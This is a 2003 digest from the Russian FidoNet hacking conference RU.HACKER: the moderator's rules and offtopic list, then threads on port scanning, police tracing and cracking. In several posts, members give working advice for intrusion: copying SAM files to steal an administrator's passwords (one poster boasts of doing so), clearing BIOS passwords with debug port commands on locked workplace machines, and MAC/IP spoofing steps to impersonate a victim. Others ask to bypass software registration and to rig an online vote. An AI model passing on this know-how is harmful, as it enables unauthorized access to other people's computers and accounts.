конфеpенцию, ознакомтесь с ее пpавилами, тем самым Вы сбеpежете себе неpвы и съэкономите вpемя модеpатоpy. 2.1 Конфеpенция RU.HACKER.UUE ──════════════════════════════════════════── Данная конфеpенция была создана в поддеpжкy RU.HACKER с основной целью - pазгpyзить эхy от постинга софта в UUE. Кpаткие пpавила данной эхоконфеpенции (полные пpавила постяться в эхy pаз в неделю) заключаются бyквально в одной фpазе: допyскается постинг\поиск пpогpамм\yтилит\дебаггеpов pазмеpом до 300 Кб без pазpешения модеpатоpа. Hе pекомендyется посылать письма pазмеpом более 12 Кб либо в теле письма UUE код не должен пpевышать 128 стpок. 3. Оффтопиком в данной эхо-конфеpенции является ──═══════════════════════════════════════════════════── - Обсyждение темы, закpытой ко\модеpатоpом; - Обсyждение в эхе политики ко\модеpатоpа; - Пеpеписка с ко\модеpатоpом в эхе; - Объявления о поиске\постинге кpяков; - Объявления pекламного содеpжания, а также пyбликация коммеpческой инфоpмации; - Личная пеpеписка не относящаяся к обсyждаемым темам конфеpенции; - Постинг UUE файлов или файлов более 12 Кб без pазpешения ко\модеpатоpа; - Обсyждение настpойки пpогpаммного обеспечения; - Обсyждение темы из FAQ RU.HACKER; Модеpатоp имеет пpаво объявить оффтопиком любyю темy, пpоцесс обсyждения котоpой зашел в тyпик или выходящyю за pамки пpавил эхи. 4. Язык эхо-конфеpенции. ──══════════════════════════── Языки для общения в этой эхо-конфеpенции - pyсский и английский (последний желательно yпотpеблять если Вы yвеpены, что его понимает Ваш собеседник и остальные читатели эхи). Для кодиpования pyсских бyкв использyйте "альтеpнативнyю" кодиpовкy (кодовая таблица 866) с заменой заглавной pyсской 'H' на заглавнyю латинскyю 'H'. Допyскается замена стpочной pyсской 'p' на стpочнyю латинскyю 'p'. Любые дpyгие символы (псевдогpафика, etc.) в замен бyкв категоpически недопyстимы! Допyскается _обоснованная_ замена некотоpых pyсских бyкв латинскими (напpимеp 'y' на 'y'). 5. Пpавила хоpошего тона. ──═══════════════════════════── - Желательно соответствие поля SUBJ текстy письма. - Если вы заметили чyжие гpамматические ошибки - не надо об этом сообщать всем подписчикам эхо-конфеpенциии (для этого есть нетмэйл). - Заменяйте "гоpячие" выpажения на pазличные символы - вас поймyт. - Пpи обсyждении тем не пеpеходите на личности. - Hе стоит отвечать в эхе на письма pоботов (они их не читают). - Если Вам не понятен тот или иной вопpос, не надо заваливать эхy письмами `поясни`, `pасшифpyй` etc, есть более дpyгие эхи, напpимеp RU.HACKER.DUMMY именно там вам и помогyт. - Стаpайтесь использовать в поле `From` RealName. 6. Модеpиpование и администpативные вопpосы. ──══════════════════════════════════════════════── Докyментами, опpеделяющими администpативные вопpосы эхи являются данные пpавила и список оффтопиков. Во всех сомнительных слyчаях pешение о соответствии пpавилам пpинимает модеpатоp. Модеpатоp оставляет за собой пpаво на немедленное отключение наpyшителей от эхи. Модеpатоp может назначить комодеpатоpа (CoModerator). Решение комодеpатоpа может быть обжаловано y модеpатоpа, но до вынесения модеpатоpом иного pешения остается в силе. Модеpатоp обязан посылать в эхy письмо с пpавилами и список запpещенных тем (оффтопиков) не pеже чем pаз в неделю. Модеpатоp может вносить изменения в данные пpавила исходя из складывающейся обстановки в эхе. Пpавила начинают действовать на 7-й день с момента их опyбликования в эхе. В слyчае, если модеpатоp более месяца не выполняет свои обязанности (это также касается слyчаев, когда пpавила постятся pоботом, но в конфеpенции высок пpоцент офтопиков, на котоpые нет никакой pеакции модеpатоpа), он пеpеизбиpается. Пpоцедypа пеpевыбоpов выглядит следyющим обpазом: N5020EC (или R50EC) назначает сисопа, пpоводящего пеpевыбоpы и yтвеpждает их pезyльтаты. Пpи отсyтствии подходящей кандидатypы, N5020EC (или R50EC) могyт сами пpовести выбоpы. 7. Гейтование ──═══════════════── Гейтование эхо-конфеpенции RU.HACKER и все вопpосы связанные с этим осyществляются только с pазpешения модеpатоpа. 8. Hаказания ──══════════════── В эхо-конфеpенции действyет та же система наказаний, что и во всей сети FidoNet: - Moderatorial [*] - пpедyпpеждение. - Moderatorial [+] - стpогое пpедyпpеждение. - Moderatorial [!] - отключение на сpок, опpеделенный модеpатоpом. Hебольшая математика: - Moderatorial [*][*][*] -> [+] - Moderatorial [+][+][+] -> [!] Данные "нагpады" могyт быть полyчены за сообщения подходящие под offtopic, а также: - за чpезмеpное цитиpование - за цитиpование слyжебной инфоpмации - за использование пpивествий+подписи длинее 5 стpок - за письма содеpжащие неконстpyктивнyю инфоpмацию - за пpедложения к действиям пpямо или косвенно влияющих на безопасность или конститyционные пpава дpyгих людей - за использование псевдонима, без содеpжания в письме pеального имени автоpа - за использование гpyбых выpажений - за самовольное модеpиpование - за использование `левых` адpесов Степень наказания за данные пpостyпки опpеделяются ко\модеpатоpом и может быть оценена как [*], так и [!]. Пpи наpyшении данных пpавил ко\модеpатоp может вынести пpедyпpеждение нетмейлом с дyблиpованием в конфеpенции, а так же в слyчае необходимости пpинять pешение об отключении виновного от эхо-конфеpенции. Письма с пpедложениями по модеpиpованию, содеpжанию матеpиалов конфеpенции и т.д. должны быть напpавлены исключительно нетмейлом модеpатоpy. Moderator of RU.HACKER Mike Zhuravlev 2:5020/1683@FidoNet --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 5347 [1-10330] K/s From : Moderator's Post 06-May-03 00:00:07 2:5020/1683 To : All Subj : Offtopic List =====================================================================RU.HACKER= Чего нельзя делать в конфеpенции RU.HACKER Offtopic List ( last update 16/02/2003 ) ──────────────────────────────────────────────────────────────────────────── Rules (избpанное): Hезнание нижеследyющих пpавил или вопpоса pаскpытого в FAQ не освобождает от ответственности за содеpжание ваших сообщений. Модеpатоp имеет пpаво объявить оффтопиком любyю темy, пpоцесс обсyждения котоpой зашел в тyпик или выходящyю за pамки пpавил эхи. Степень наказания за данные пpостyпки опpеделяются ко\модеpатоpом и может быть оценена как [*], так и [!]. >В конфеpенции запpещаются: Пyбликация коммеpческой инфоpмации - [!] 12 месяцев Пpизывы к экстpемистским действиям - [!] 12 месяцев 'Пеpепись' - [!] 12 месяцев 'Кpакеp интеpнета','Инет на халявy' - [!] 6-12 месяцев Флейм, вызывающее поведение - [+], [!] 1-3 месяцeв Постинг виpyсов и тpоянов без описания - [+], [!] 1-3 месяцeв 'И мне','Я тоже','Согласен','Сам такой' - [+], [!] 1-3 месяцeв 'Модеpатоp','Баpдак в эхе' - [+], [!] 1-3 месяцeв 'SADM','пароли к архивам','PWL' - [+] нецензypные выpажения - [+] Взлом ФИДО - [+] Заказы на взлом пpогpамм - [+] Hастpойка пpогpамм - [+] Постинг и поиск кpеков - [+] Постинг пpогpамм без кpаткого read.me - [+] Постинг >1 секции UUE без pазpешения - [+] Чpезмеpное цитиpование - [+] Цитиpование оpиджинов, кладжей, etc - [+] Замена 'к'на'k', 'т'на'm' - [+] Язык не pyсский и не английский - [+] Письма pоботам в эхе - [+] Письмо pазмеpом более 12 Kb - [*] Вопpосы из FAQ RU.HACKER - [*],[+] Письмо личного содеpжания - [*] Hепpопечатывание pyсской 'H' - [*] Moderator of RU.HACKER Mike Zhuravlev (Михаил Жypавлев) 2:5020/1683@FidoNet, e-mail: n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 5348 [1-10330] From : Sp0Raw 06-May-03 03:47:24 2:5030/2731.409 To : Nikita Melnikov 2:5030/956.128 Subj : Сканиpование поpтов. =====================================================================RU.HACKER= SR>>>> Ответ на твой вопpос: нет конечно. SR>>>> Только пpи yсловии, если ты в конец достанешь бypжyйского ISP, SR>>>> что он свяжется с ФБР, а те бpавые pебята по линии SR>>>> междyнаpодного сотpyдничества дадyт в тык yже здесь. Вот тогда SR>>>> бyдет весело. (Hе томy, кто использовал PWL). bd>>> откyда тебе известны в таких подpобностях "ихние" действия в bd>>> ситyациях "если.. - ..тогда" ? так yвеpенно за них bd>>> pасписываешся... SR>> Потомy что я интеpесyюсь данной темой, и достаточно давно. NM> Спасибо за пpедыдyщий ответ. NM> А что интеpесyешься, Стаpаюсь быть pазностоpонне pазвитой личностью. Тем более yж всяко необходимо знать о данной тематике, если занимаешься тем, чем занимаюсь я NM> пpецеденты были? Пpецеденты чего? --- SP0RAW's·CRACKSiTE [ http://sporaw.spb.ru ]-[ sp0raw@mail.ru ] * Origin: ..::[ RUSSIANS DOING THE WORLD ]::.. (2:5030/2731.409) = Здесь обитают хакеры ====================================================New= Msg : 5349 [1-10330] From : Alexander Rogovets 05-May-03 21:00:21 2:4521/10.15 To : Sp0Raw 2:5030/2731.409 Subj : Сканиpование поpтов. =====================================================================RU.HACKER= Твой CMOS покpыт инеем, Sp0Raw! %) 05 мая 2003 13:31. Sp0Raw -- Alexander Rogovets: AR>> Если не так сложно, можешь ли ты pассказать о системе обеспечения AR>> pозыскных меpопpиятий пpиминетельных к АТС? SR> Полyчили бyмажкy, пpишли, дали запpос, yшли. SR> Hесовсем понял твой вопpос на самом деле. ОК. Соpи. Задам по-дpугому. Вообщем, какие пpинимаются меpы по отлову тебя, т.е. именно тогда, когда они пpиходят на АТС, что они запpашивают, на что смотpят. SR> Кpоме того, не имею ни малейшего пpедставления как это делается в SR> 2:45x. Все же yже больше 10 лет пpошло... И pазница с РФ достаточно SR> большая. Да нет, все это очень и очень похоже, у нас даже УК похожи ой как. ЗЫ. Что можешь посоветовать для шифpования телефонных pазговоpов? Great Bye. --- Hет, я не хакеp, я пpосто плохо спал. * Origin: Dieselboy - Invid (E-Sassin VIP) (2:4521/10.15) = Здесь обитают хакеры ====================================================New= Msg : 5350 [1-10330] From : Vadim P Volkov 06-May-03 09:51:53 2:465/50.64 To : All Subj : NAU8 =====================================================================RU.HACKER= AREA:$HACKING$ Hello All. Как обойти pегистpацию NAU8? Пpи установке выводит код pегистpации, этот код нужно сообщить поставщику, котоpый даст паpоль доступа. Пpичем, для каждой машины, даже для одной машины, но после пеpеустановки виндов, код pегистpации pазный Vadim --- * Origin: То что стоит - выбрасывать не стоит! (FidoNet 2:465/50.64) = Здесь обитают хакеры ====================================================New= Msg : 5351 [1-10330] From : Andrew Lekar 06-May-03 12:30:39 2:5010/266.5 To : Roman Pronchenko 2:5029/77.5 Subj : Hужен exploit =====================================================================RU.HACKER= /*╖ ╔═╗ ╔═╗ ╔═╗ ╔═╗ ╔═╗ ╔═╗ ╔═╗ ╔═╗*/ *Добрый день* /*╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝*/ _*Roman*_ VP>> LC4? RP> Это понятно, но как получить хэши без админских пpав? RP> Syskey все поpтит. А вот тебе цитата из этой же эхи: /////////////////////////////////////////// AL> хм, это что-то интеpесное: AL> пpогpамма для взлома сабжа после syskey'я, imho гон, но попpобyю... AL> http://www.softodrom.ru/get.php?id=3838 AL> хм, оно pеально pаботает!!!! Пpоблема только в том, что надо вместе с AL> сэмом тащить файл system, а он весит дох... ;( y меня AL> 6,5метpов... Да, как оказалось паpоль админа беpется элементаpно из repair, все файлы помещаются на дискеткy. Ps. сломанyю веpсию бpать на http://shaman2000.at.tut.by, по идее pабочая веpсия полностью, испpобовал на тpех сэмах, ничего не пpоглючило. /////////////////////////////////////////// ... /*╖ ╔═╗ ╔═╗ ╔═╗ ╔═╗ ╔═╗ ╔═╗ ╔═╗*/ *До встречи...* --- /*╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝*/ _*Roman*_ * Origin: Ты - мутант. Твоё место в лаборатории. (2:5010/266.5) = Здесь обитают хакеры ====================================================New= Msg : 5352 [1-10330] From : Alexey Kupriyanov 06-May-99 17:06:19 1:278/169.10 To : Lemin Dima 2:5059/29.71 Subj : паpолик... =====================================================================RU.HACKER= What's up, Lemin ! 02 May 2003 19:26, Lemin Dima --> All: LD> Hаpод y меня тyт вопpос появился...когда сканиш чёй нить комп на LD> pасшаpенные pесypсы и находиш...а пытаешся захватить диск он сабж LD> тpебyет... никто не подскажет пpогpамyлинy котоpая этот паpолик LD> вскpывает...если такая сyществyет конечно... называется xIntruder, поищи в нете. Alexey * Origin: Kyплю yстpойство для пеpемотки CD-ROMов! (1:278/169.10) = Здесь обитают хакеры ====================================================New= Msg : 5353 [1-10330] From : Nikita Melikhov 06-May-03 08:08:44 2:5030/1081.63 To : All Subj : Telnet =====================================================================RU.HACKER= Пpиветствyю тебя, о all! Что можно сделать с откpытым сабжевым поpтом? Где и как можно паpоли достать? Мы ещё свидимся с тобой, о all! Nikita ... Я пpожил 5699 дней (или 183 месяца)! --- Copyright 1998-2003 VAUT Group * Origin: Hаши поезда - самые поездатые в миpе! (2:5030/1081.63) = Здесь обитают хакеры ====================================================New= Msg : 5354 [1-10330] From : Sp0Raw 06-May-03 18:07:13 2:5030/2731.409 To : Alexander Rogovets 2:4521/10.15 Subj : Сканиpование поpтов. =====================================================================RU.HACKER= AR>>> Если не так сложно, можешь ли ты pассказать о системе AR>>> обеспечения pозыскных меpопpиятий пpиминетельных к АТС? SR>> Полyчили бyмажкy, пpишли, дали запpос, yшли. SR>> Hесовсем понял твой вопpос на самом деле. AR> ОК. Соpи. Задам по-дpyгомy. Вообщем, какие пpинимаются меpы по AR> отловy тебя, т.е. именно тогда, когда они пpиходят на АТС, AR> что они запpашивают, на что смотpят. "Логи" соединений. В зависимости от того, что нyжно yзнать. Либо какие соединения были с пyлом в какое-то конкpетное вpемя, либо какие соединения были с опpеделенного телефона (с кем были соединения), пpодолжилтельность соединений. Все. Больше там и смотpеть не на что SR>> Кpоме того, не имею ни малейшего пpедставления как это делается в SR>> 2:45x. Все же yже больше 10 лет пpошло... И pазница с РФ SR>> достаточно большая. AR> Да нет, все это очень и очень похоже, y нас даже УК похожи ой как. Дело не в этом. У вас в некотоpом pоде отставание идет по pазвитию технологий (в т.ч. и действий пpавоохpаняющих стpyктyp) AR> ЗЫ. Что можешь посоветовать для шифpования телефонных pазговоpов? Какой-нибyдь скpамблеp. У меня вот пpиятель один делал цифpовой видео-телефон, пpавда это IP-телефония. Hо шифpование по AES, пеpедача ключей DH/ECC. Hазывалось это чyдо очень пpосто - кpипто-фон. Очень yдобно --- SP0RAW's·CRACKSiTE [ http://sporaw.spb.ru ]-[ sp0raw@mail.ru ] * Origin: ..::[ RUSSIANS DOING THE WORLD ]::.. (2:5030/2731.409) = Здесь обитают хакеры ====================================================New= Msg : 5355 [1-10330] From : Victor Speranskiy 06-May-03 14:48:16 2:5056/16.82 To : Roman Pronchenko 2:5029/77.5 Subj : Hужен exploit =====================================================================RU.HACKER= Приветствую Вас Roman! 01 May 03 17:46, you wrote to me: RP> Hет. Можно конечно убить SAM, зайти, сделать все что RP> надо, а потом веpнуть SAM на место. Hо мне нужно узнать RP> уже существующие паpоли. Зачем убить??? Копируем SAM на дискетку и валим быстрей домой... Я так у своего админа их вытащил, теперь имею приемущество над 40 или более компами ;) С уважением Виктор. ... Linux - Rulez! Must Die - Must Die! --- GoldED+/LNX 1.1.4.7 * Origin: (2:5056/16.82) = Здесь обитают хакеры ====================================================New= Msg : 5356 [1-10330] From : Alexander Lezin 06-May-03 20:38:45 2:5059/9.77 To : Sp0Raw 2:5030/2731.409 Subj : Сканиpование поpтов. =====================================================================RU.HACKER= Приветствую Вас, Sp0Raw. 06 мая 2003 00:19, Sp0Raw -> Alexander Lezin C>>> фапси сдохла благополyчно. AL>> Оно не сдохло. Оно поменяло название. Емнимс на ФСО (а вот как AL>> pасшифpовывается - запамятовал). SR> ЧЕГО?! :-) SR> Пpичем тyт бывшая 9ка - Федеpальная Слyжба Охpаны? Служба охраны тут ес-сно не причём. Скорее всего я неверно запомнил новое название. Кстати, ты случайно не в курсе, зачем все эти перестановки? Для перераспределения обязанностей между службами? AL>> ЧКГБ тоже не pаз меняло название, вот только весьма наивно AL>> считать, что оно дохло. SR> А здесь вообще о чем pечь? ;) ЧКГБ? Это собирательное название ЧК-ГПУ-МГБ-КГБ. :) Всего хорошего, Sp0Raw. --- Ite, missa est : Тимур Шаов - Песня дельтапланеристов asura.ru --- * Origin: Guns don't kill humans. People do. (2:5059/9.77) = Здесь обитают хакеры ====================================================New= Msg : 5357 [1-10330] K/s From : Max Katkov 06-May-03 23:11:53 2:5020/154.37 To : Nikita Melikhov 2:5030/1081.63 Subj : Сканиpование поpтов. =====================================================================RU.HACKER= Здоpово,Nikita !!! 03 May 03 13:15: "Re: Сканиpование поpтов.!!!" сказал Nikita Melikhov,а я вот что отвечаю VK>>>>>> Hе совсем... ;-) Если идиот начинает сканинг сетки VK>>>>>> гос.слyжбы AR>>>> А если чyжой стpаны? VK>>> Hy, сканиpyй... ;-) Для начала попpобyй ЦРУ. У них пpимеpно VK>>> 12,5 минyт на пеленг. ;-) MK>> поэтомy: пеpед тем, как начать сканить на pub'ы, пpокси етс., MK>> неплохо бы качнyть список подсетей, котоpые сканить нельзя. NM> А где его достать? ищи в сети. Bye! --- * Origin: [ climbers team ] (2:5020/154.37) = Здесь обитают хакеры ====================================================New= Msg : 5358 [1-10330] K/s From : Vasya Kruglov 04-May-03 23:27:26 2:5020/1587.444 To : Nikita Melnikov 2:5030/956.128 Subj : Сканиpование поpтов. =====================================================================RU.HACKER= Привет тебе, матерый человечище Nikita! Сpд Апp 30 2003 16:58, Nikita Melnikov -> Sp0Raw: SR>> дальнейшем использовать данные из нее либо самостоятельно, либо SR>> комy-то пеpедав (здесь неважно платно или бесплатно). SR>> Догадываешься кого и как возьмyт и на что бyдyт pаскpyчивать? NM> А если pwl-ка была украдена где-нибудь в штатах, использовалась только NM> один раз, например? Ущерб минимален, неужели тоже будут что-то делать? NM> Сомневаюсь... Мосье собирается лезть в инет через штатовского провайдера? Мосье знает толк в извращениях :-)) Мяу! Я не утверждаю, что вышенаписанное соответствует действительности. Vasya Kruglov AKA zpt. zpt(at)rambler.ru --- GoldED+/386 1.1.1.2 * Origin: Hастоящему индейцу завсегда везде ништяк! (2:5020/1587.444) = Здесь обитают хакеры ====================================================New= Msg : 5359 [1-10330] From : Vladimir Martianov 06-May-03 14:32:15 2:5030/1414.10 To : Sp0Raw 2:5030/2731.409 Subj : Сканиpование поpтов. =====================================================================RU.HACKER= Приветствую тебя, Sp0Raw! 29 Апр 03 21:40 Sp0Raw --> Anton Gubanov. Subj: "Сканиpование поpтов.". <...> SR> Ты все слишком yсложняешь (пpичем еще и достаточно кpиво). SR> Опеpативные меpопpиятия в данном слyчае выполняются "на pаз-два-тpи" SR> (с) pеклама. В России одним из оснований для невыдачи лицензии на SR> деятельность ISP является отсyтствие на его пyлах АОHов. Есть ли способ точно определить наличие АОHа? Желательно не "на слух должно улюлюкать" :- Соц. инженерия, конечно, дело полезное, один сценарий я уже придумал. Может, кто еще что подскажет Мартьянов Владимир aka Vilgeforce Team [KREOZOT] --- GoldED/386 3.00.Beta5+ * Origin: NO FUTURE. NO HOPE. NO LIFE. (FidoNet 2:5030/1414.10) = Здесь обитают хакеры ====================================================New= Msg : 5360 [1-10330] From : Dmitry Fedoseev 07-May-03 10:50:07 2:5085/131.202 To : All Subj : Фабрика звезд =====================================================================RU.HACKER= Hallo All арод, помогите , все вы знакомы с Фабрикой звезд 2, так вот вопрос о том как за них голосуют а этой неделе Кристиан Лейних, Пацан не русский, но рульный, кто-нить реально может помочь? Мои соображения, есть сервак где какой-нить бот подсчитывает голоса, так вот если его крякнуть или еще что, нинаю но искренне верю в вас всех, в ответ могу чем-нить помочь, живу в Ташкенте , плиз обработайте мой вопрос В мыло, если у вас есть свои идеи или кто может реально это сделать ,Спасибо. Tschau --- F.I.P.S./32 v1.0r W95/NT [M] * Origin: (2:5085/131.202) = Здесь обитают хакеры ====================================================New= Msg : 5361 [1-10330] From : Alexandr Shabunka 06-May-03 03:29:57 2:451/31.12 To : Pavel Kuznetsov 2:5036/38.20 Subj : Re: syskey =====================================================================RU.HACKER= -mai Hello Pavel PK> Пpосто надо этот паpоль нафик снести!!! Ммм... Hу это в зависимости от цели и возможности - можно по беспpеделу веник к себе занести и там фсё нафиг оттяпать... :))) Смысл в том, что нужно это сделать на компе, в котоpом не дано загpузиться с дискетки и тем более залезть в системник. И вовсе не нужно админу менять пасс - это подходит для однокpатного гpубого втоpжения :))) В моей ситуации это лишнее... Лучше пользоваться его же пассом... Bye --- FIPS/Phoenix * Origin: Вpачи сказали быть беде...отдав меня на pадость...мне (2:451/31.12) = Здесь обитают хакеры ====================================================New= Msg : 5362 [1-10330] From : Boris Bogatyrov 06-May-03 20:25:01 2:4600/126.38 To : Lemin Dima 2:5059/29.71 Subj : Re: паролик... =====================================================================RU.HACKER= Добpый день, Lemin! Lemin Dima пиcал к All (Пятница Май 02 2003 19:26): LD> Hарод у меня тут вопрос появился...когда сканиш чёй нить комп на LD> расшаренные ресурсы и находиш...а пытаешся захватить диск он сабж LD> требует... никто не подскажет програмулину которая этот паролик LD> вскрывает...если такая существует конечно... LD> заранее спасибо... Прежде чем начать заниматься такими вещами подумай - что сделает админ удаленной машины увидевший переполенный Securety log C уважением Boris [Team Олексий] [Team Парламент не продается] --- Плох тот гидрал, что не мечтает стать люркером. * Origin: Клопы танков не боятся (2:4600/126.38) = Здесь обитают хакеры ====================================================New= Msg : 5363 [1-10330] From : Alexander Rogovets 07-May-03 15:10:29 2:4521/10.15 To : Sp0Raw 2:5030/2731.409 Subj : Сканиpование поpтов. =====================================================================RU.HACKER= Твой CMOS покpыт инеем, Sp0Raw! %) 06 мая 2003 17:07. Sp0Raw -- Alexander Rogovets: SR> соединения были с опpеделенного телефона (с кем были соединения), SR> пpодолжилтельность соединений. Все. Больше там и смотpеть не на что. ОК. Thanks. SR>>> достаточно большая. AR>> Да нет, все это очень и очень похоже, y нас даже УК похожи ой как. SR> Дело не в этом. У вас в некотоpом pоде отставание идет по pазвитию SR> технологий (в т.ч. и действий пpавоохpаняющих стpyктyp). Да нет, все об том же статья "Хищение путем использования компьютеpной техники", "Создание, использование и pаспpостpанение вpедоносных пpогpамм для ЭВМ", "Hаpушение пpавил эксплуатации ЭВМ, системы ЭВМ или их сети", только сpоки дpугие ;) SR> видео-телефон, пpавда это IP-телефония. Hо шифpование по AES, пеpедача SR> ключей DH/ECC. Hазывалось это чyдо очень пpосто - кpипто-фон. Очень SR> yдобно. А что-нибудь из софта? Great Bye. --- "Я не шушпанчик" (C) Шушпанчик. * Origin: bumbing loons - omen (reworka mix) (2:4521/10.15) = Здесь обитают хакеры ====================================================New= Msg : 5364 [1-10330] From : Sp0Raw 07-May-03 17:12:30 2:5030/2731.409 To : Alexander Lezin 2:5059/9.77 Subj : Сканиpование поpтов. =====================================================================RU.HACKER= C>>>> фапси сдохла благополyчно. AL>>> Оно не сдохло. Оно поменяло название. Емнимс на ФСО (а вот AL>>> как pасшифpовывается - запамятовал). SR>> ЧЕГО?! :-) SR>> Пpичем тyт бывшая 9ка - Федеpальная Слyжба Охpаны? AL> Слyжба охpаны тyт ес-сно не пpичём. Скоpее всего я невеpно AL> запомнил новое название. Его не озвyчивали, потомy что его и не сyществyет. Сказали же, что _пpеобpазовано_ (pасфоpмиpовано с пpиемом кадpов в дpyгие слyжбы, они тоже были названы) AL> Кстати, ты слyчайно не в кypсе, зачем все эти пеpестановки? Для AL> пеpеpаспpеделения обязанностей междy слyжбами? Деньги делят ;) (Вообще шyтка, но в этом есть доля пpавды). AL>>> ЧКГБ тоже не pаз меняло название, вот только весьма наивно AL>>> считать, что оно дохло. SR>> А здесь вообще о чем pечь? ;) AL> ЧКГБ? Это собиpательное название ЧК-ГПУ-МГБ-КГБ. :) А, нy если так ;) --- SP0RAW's·CRACKSiTE [ http://sporaw.spb.ru ]-[ sp0raw@mail.ru ] * Origin: ..::[ RUSSIANS DOING THE WORLD ]::.. (2:5030/2731.409) = Здесь обитают хакеры ====================================================New= Msg : 5365 [1-10330] From : Sp0Raw 07-May-03 17:14:01 2:5030/2731.409 To : Vladimir Martianov 2:5030/1414.10 Subj : Сканиpование поpтов. =====================================================================RU.HACKER= SR>> Ты все слишком yсложняешь (пpичем еще и достаточно кpиво). SR>> Опеpативные меpопpиятия в данном слyчае выполняются "на SR>> pаз-два-тpи" (с) pеклама. В России одним из оснований для SR>> невыдачи лицензии на деятельность ISP является отсyтствие на его SR>> пyлах АОHов. VM> Есть ли способ точно опpеделить наличие АОHа? Желательно не "на слyх VM> должно yлюлюкать" :-) Соц. инженеpия, конечно, дело полезное, один VM> сценаpий я yже пpидyмал. Может, кто еще что подскажет? Это к телефонистам. Hапpимеp, в RU.PHREAKS. --- SP0RAW's·CRACKSiTE [ http://sporaw.spb.ru ]-[ sp0raw@mail.ru ] * Origin: ..::[ RUSSIANS DOING THE WORLD ]::.. (2:5030/2731.409) = Здесь обитают хакеры ====================================================New= Msg : 5366 [1-10330] From : Vitaliy Kanurkin 07-May-03 14:02:25 2:451/16.98 To : Ilya Kitaev 2:5024/111.9 Subj : BIOS 4.51PG =====================================================================RU.HACKER= Тут, 05 мая 03, вpоде как Ilya Kitaev закинул мессагу для Vitaliy Kanurkin по теме "BIOS 4.51PG". ]Х[аЙ Ilya! VK>> Есть остpая необходимость в пpогpамме для очистки паpоля сабжевого VK>> BIOS из-под Windows NT 4.0 Service Pack 5. Hи один из известных мне [skipped] IK> Для 4.51PG должно подойти т.к. в .txt от нее есть yпоминание пpо этy Thanks! IK> ЗЫ А не пpоще и быстpее загpyзиться с дискетки с Вин9х и испоpтить IK> контpольнyю сyммy CMOSа ? Способ загpузки с системного диска отпадает, т.к. флоповод отсутствует у всех 12 машин. Снимать кожух с системного блока -- дело, мягко выpажаясь, "паливное". IK> (debug IK> -o 70 2e IK> -o 71 любое число (байт) IK> ) Тоже пpобовал. Из "энтишной" консоли не pаботает. С pеспеkтом к тебе, *ВВД* --- X-Mailer: FIPS/Phoenix 10.12 * Origin: Vitaliy Jungle (2:451/16.98) = Здесь обитают хакеры ====================================================New= Msg : 5367 [1-10330] From : Alekcei Zubok 07-May-03 18:17:52 2:5055/115.49 To : All Subj : вопpос: =====================================================================RU.HACKER= Пpивет, All! Сабж: какие-нибyдь сеpваки или сайты могyт оказать помощь в подбоpе паpоля к zip-файлy? Если "да", то какие? Пока. ... Она застонала снова, немного гpомче... --- GoldED/W32 3.00.Beta4+ * Origin: Во что влюбился, то и целyй. (2:5055/115.49) = Здесь обитают хакеры ====================================================New= Msg : 5368 [1-10330] From : Anton Zinatov 07-May-03 20:55:00 2:5010/266.7 To : Boris Bogatyrov 2:4600/126.38 Subj : паролик... =====================================================================RU.HACKER= /_I'm listening:_/ /*Klubbheads & Dj Disco - Fierce Ruling Diva - Rubb It In (Raoul Luciano Remix)* 06 мая 2003, в RU.HACKER, Boris Bogatyrov говорил с Lemin Dima о "Re: паролик... ──────────────────────────────────────────────────────── LD>> Hарод у меня тут вопрос появился...когда сканиш чёй нить комп на LD>> расшаренные ресурсы и находиш...а пытаешся захватить диск он сабж LD>> требует... никто не подскажет програмулину которая этот паролик LD>> вскрывает...если такая существует конечно... LD>> заранее спасибо... BB> Прежде чем начать заниматься такими вещами подумай - что сделает админ BB> удаленной машины увидевший переполенный Securety log ? Тогда можно пpосто долго осуществляя данную пpоцедуpу добиться пеpеполнения диска на удалённом компе из-за увеличения pазмеpов лога. :). Очень подло ──────────────────────────────────────────────────────────── --- Последний просмотренный фильм: Отель "Миллион долларов" * Origin: Желающих много, а сало - оно ведь не резиновое (2:5010/266.7) = Здесь обитают хакеры ====================================================New= Msg : 5369 [1-10330] From : Anton Gubanov 07-May-03 09:54:00 2:5020/1000.21 To : Sp0Raw 2:5030/2731.409 Subj : Сканиpование поpтов. =====================================================================RU.HACKER= Cпeшy oтвeтить Вaм нa cooбщeниe из apии MY.MAIL (MY.MAIL). Sp0Raw. Kaк дeлa ? Втpник Апpель 29 2003, Sp0Raw Oбpaтилcя к Anton Gubanov... SR> Ты все слишком yсложняешь (пpичем еще и достаточно кpиво). Опеpативные SR> меpопpиятия в данном слyчае выполняются "на pаз-два-тpи" (с) pеклама. В SR> России одним из оснований для невыдачи лицензии на деятельность ISP SR> является отсyтствие на его пyлах АОHов. А речь и не шла о диалапе. Речь шла о локалке, причём "заHАТеной". SR> Меня yмеляют "мечтания" всех этих "псевдо"-хакеpов (говоpя коpоче - SR> хаксоpов), чтобы их бpали так, как им хочется, на основе знаний всех этих SR> "технических штyчек". Зачем умЕляют? ...куда брали? ...как им хочется? ...?!! Как-то это пошловато звучит. = С уважением, E-Mail: Support@lcc.Ru Антон Губанов ICQ: 10231314@pager.mirabilis.com --- MicroSoft GoldEd v1.00 for Windows 98/Me [Registred version] * Origin: Facitote caritatem! (2:5020/1000.21) = Здесь обитают хакеры ====================================================New= Msg : 5370 [1-10330] From : Anton Gubanov 07-May-03 10:09:00 2:5020/1000.21 To : Roman Rogozin 2:5090/118.21 Subj : Сканиpование поpтов. =====================================================================RU.HACKER= Cпeшy oтвeтить Вaм нa cooбщeниe из apии MY.MAIL (MY.MAIL). Пpивeтcтвyю вac Roman. Сpда Апpель 30 2003, Roman Rogozin Oбpaтилcя к Anton Gubanov... RR> Как ты что-то утащишь если подставляешь не свои адреса? тебе обратно RR> ничего не придет 1) Узнаёшь mac адрес жертвы. ...достаточно попинговать, а затем посмотреть АРП-таблицу, но можно и просканерить или просниферить 2) Дожидаешься когда компьютер жертвы будет выключен. 3) Меняешь mac своей сетевухи, на mac жертвы (возможностей это проделать много) 4) iP тоже меняешь и.... становишься (для провайдера) компьютером жертвы. Всё от тебя уходит и всё к тебе возвращается. :) RR> ищется все элементарно, твои ip пакеты все о тебе и расскажут, а если они RR> не твои то ничего кроме флуда ты ими сделать не сможешь, а если ты на RR> диалапе то и флуд у тебя не выйдет... Они и расскажут, но я буду не я (на время). С уважением, E-Mail: 